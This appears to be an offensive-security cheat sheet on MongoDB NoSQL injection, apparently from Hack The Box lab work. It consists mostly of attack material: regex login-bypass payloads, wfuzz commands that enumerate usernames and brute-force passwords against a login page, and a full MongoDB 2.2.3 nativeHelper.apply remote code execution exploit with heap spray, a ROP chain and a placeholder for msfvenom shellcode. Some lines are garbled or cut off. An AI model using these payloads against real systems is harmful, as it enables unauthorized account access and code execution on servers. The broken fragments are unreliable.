NoSql
nosql injection
| sql | desc |
|---|---|
username=admin&password[$regex]=^a.*&login=login | user = admin, pass start with a |
username=admin&password[$regex]=^b.*&login=login | user = admin, pass start with b |
username=admin&password[$regex]=^c.*&login=login | user = admin, pass start with c |
user enumeration
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://staging-order.mango.htb
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://staging-order.mango.htb
password bruteforce
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt --sc 302 -d 'username=admin&password[$regex]=^FUZZ.*&login=login' http://staging-order.mango.htb
. * & ? \ | will be always returned MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution
- https://notes.offsec-journey.com/owasp-top-10-exploitation/untitled
|-> If attempting via Web Mongo Injection, try : ';shellcode=un..... |-> Note the // at the end to comment the rest of the code.db.my_collection.find({'$where':'shellcode=unescape(">INSERT MSFVENOM GENERATED JS SHELLCODE>"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})//